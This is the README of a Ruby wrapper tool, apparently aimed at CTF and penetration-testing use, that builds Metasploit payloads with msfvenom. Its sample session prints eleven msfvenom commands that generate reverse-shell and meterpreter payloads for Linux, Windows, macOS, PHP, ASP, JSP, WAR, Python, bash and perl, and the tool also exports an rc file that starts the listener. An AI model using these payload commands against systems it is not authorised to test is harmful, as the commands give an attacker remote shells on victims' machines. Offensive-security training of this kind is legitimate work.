# MSFvenom Helper - MSFvHelper

Quick way of generating simple meterpreter payloads using `msfvenom`. Additionally it includes various reverse shells from pentestmonkey.

## About

MSFvenom Helper is a wrapper for creating various types of payloads based on the users choice. It accepts minimal arguments so it's very simple to use. The only thing you really need to specify is the interface to use (tun0 if you do VPN CTFs) and a local port.

Additionally, it's really easy to view and select the payload that you want, as seen below all you need to do is specify a number and it will generate the payload and a corresponding rc file.

```
root@kali:/opt/msfvhelper# ./msfvhelper.rb -i tun0 --lport 1234
Interface: tun0, IP: x.x.x.x, Port: 1234
[*] binary
  [>] linux:	[0] msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=1234 -f elf > shell.elf
  [>] windows:	[1] msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=1234 -f exe > shell.exe
  [>] mac:	[2] msfvenom -p osx/x86/shell_reverse_tcp LHOST=x.x.x.x LPORT=1234 -f macho > shell.macho
[*] web
  [>] php:	[3] msfvenom -p php/meterpreter_reverse_tcp LHOST=x.x.x.x LPORT=1234 -f raw > shell.php
  [>] asp:	[4] msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=1234 -f asp > shell.asp
  [>] aspx:	[5] msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=1234 -f asp > shell.aspx
  [>] jsp:	[6] msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=1234 -f raw > shell.jsp
  [>] war:	[7] msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=1234 -f war > shell.war
[*] script
  [>] python:	[8] msfvenom -p cmd/unix/reverse_python LHOST=x.x.x.x LPORT=1234 -f raw > shell.py
  [>] bash:	[9] msfvenom -p cmd/unix/reverse_bash LHOST=x.x.x.x LPORT=1234 -f raw > shell.sh
  [>] perl:	[10] msfvenom -p cmd/unix/reverse_perl LHOST=x.x.x.x LPORT=1234 -f raw > shell.pl
Which payload would you like to run? Select a number between 0 and 10. Type nothing if you want to exit.
1
[+] msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=1234 -f exe > shell.exe
Finished creating the payload. Good luck! You can find that results at the specified output file.
[*] Exported Metasploit RC file as shell.rc. Run msfconsole -r shell.rc to execute and create listener.
```

## JSON Config

The script gathers the payloads to use from it's accompanying `config.json` file. 

This makes it relatively simple to modify commands whenever it is needed.

## To-Do List
* Change default interface to eth0
* Implement `other` key
  * Create a flag that shows it
  * Try to integrate it with rc payloads, for example create a subvalue that defines what type of handler it needs and have it work with msfvenom
* Change output filenames to something uniqe, like linux-x86-meterpreter-reverse-tcp-1234.elf and linux-x86-meterpreter-reverse-tcp-1234-elf.rc
* Use built-in ruby commands to justify text correctly instead of using tabs
